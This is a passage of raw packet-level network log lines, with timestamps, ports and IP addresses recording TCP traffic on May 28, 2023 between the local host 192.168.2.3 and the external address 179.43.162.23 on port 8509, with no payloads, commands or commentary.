May 28, 2023 10:50:04.952965021 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.953020096 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.953035116 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.953041077 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.953059912 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.953078985 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.953097105 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.953114986 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.953172922 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.953993082 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954018116 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954036951 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954056025 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954073906 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954083920 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.954093933 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954113007 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954127073 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.954154015 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.954188108 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.954845905 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954869986 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954889059 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954907894 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954927921 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954946041 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.954952002 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.954966068 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.955003977 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.955029011 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.955882072 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.955905914 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.955925941 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.955945015 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.955950975 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.955984116 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.956413984 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.956434965 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.956453085 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.956471920 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.956475019 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.956494093 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.956509113 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.956511974 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.956532001 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.956532001 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.956587076 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.957351923 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.957375050 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.957396030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.957413912 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.957433939 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.957452059 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.957453012 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.957469940 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.957484007 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.957509041 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.958312035 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.958334923 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.958370924 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.958406925 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.958420038 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.958439112 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.958457947 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.958476067 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.958503962 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.958507061 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.958554029 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.959203959 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959228039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959247112 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959265947 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959291935 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.959321976 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.959748030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959768057 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959806919 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959836006 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.959841013 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959861994 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959906101 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959922075 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.959927082 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.959963083 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.968075991 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968108892 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968127966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968147993 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968147993 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.968185902 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968188047 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.968206882 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968225956 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968229055 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.968297958 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.968324900 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968343019 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968364000 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.968400955 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.969201088 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969222069 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969254017 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.969707966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969750881 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969763994 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.969772100 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969793081 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969813108 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969820023 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.969831944 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969852924 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.969867945 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.969893932 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.970213890 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.971853018 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.971880913 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.971899986 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.971904993 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.971919060 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.971937895 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.971955061 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.971975088 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.973824978 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.973941088 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.993479967 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993515968 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993535995 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993550062 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993576050 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993609905 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993628979 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993648052 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993669987 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993674040 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.993690014 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993709087 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993714094 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.993726969 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993747950 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993751049 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.993774891 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.993933916 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993953943 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993973970 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993993998 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.993995905 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994014025 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994020939 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994033098 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994051933 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994060993 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994070053 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994105101 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994412899 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994434118 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994455099 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994473934 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994493961 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994497061 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994497061 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994513035 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994533062 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994546890 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994551897 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994580984 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994581938 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994605064 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994623899 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994626999 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994643927 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994663954 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.994672060 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.994714975 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.995409966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995434046 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995501995 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.995573044 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995593071 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995611906 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995630026 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995651007 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995671034 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995676994 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.995692015 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995707035 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.995712042 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995726109 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.995733023 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995753050 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.995764971 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.995795012 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.996386051 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996409893 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996428967 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996450901 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996469021 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996480942 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.996490002 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996517897 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.996546984 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.996603966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996627092 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996645927 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996665001 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996691942 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.996728897 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.996733904 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996754885 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996776104 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.996820927 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.997200966 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997221947 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997241020 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997253895 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997287989 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.997287989 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.997308016 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997328997 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997348070 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997366905 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997370005 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.997387886 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997400045 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.997407913 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997426987 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997441053 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.997446060 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.997481108 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.998087883 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998112917 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998131990 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998150110 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998167992 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.998169899 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998189926 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998200893 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.998209953 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998218060 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.998228073 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998245955 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998264074 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998270988 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.998281956 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998301029 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998310089 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.998320103 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.998332977 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.998394966 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.999161959 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999187946 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999207973 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999228001 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999248981 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999259949 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.999269962 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999289989 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999295950 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.999309063 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999327898 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999337912 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.999347925 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999358892 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.999367952 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999387026 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999406099 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.999444008 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:04.999950886 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999974012 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:04.999993086 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000015020 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000036001 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000055075 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000060081 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.000073910 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000093937 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000113010 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000117064 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.000117064 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.000130892 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000153065 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.000169039 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000178099 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.000190020 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000216961 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000240088 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.000900030 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000926971 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000946045 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000958920 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000973940 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.000978947 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.000992060 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001010895 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001020908 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001030922 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001046896 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001053095 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001071930 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001085997 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001091957 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001102924 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001121044 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001148939 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001776934 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001838923 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001848936 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001858950 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001879930 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001899004 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001913071 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001916885 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001930952 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001949072 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.001985073 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.001992941 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002007961 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.002012014 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002033949 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002046108 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.002054930 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002073050 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002119064 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.002135992 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.002863884 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002887011 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002907038 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002919912 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002933979 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002947092 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002968073 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.002965927 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.002988100 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.003005028 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.003009081 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.003021955 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.003027916 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.003046989 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.003067017 CEST	8509	49699	179.43.162.23	192.168.2.3
May 28, 2023 10:50:05.003071070 CEST	49699	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:05.003071070 CEST	49699	8509	192.168.2.3	179.43.162.23
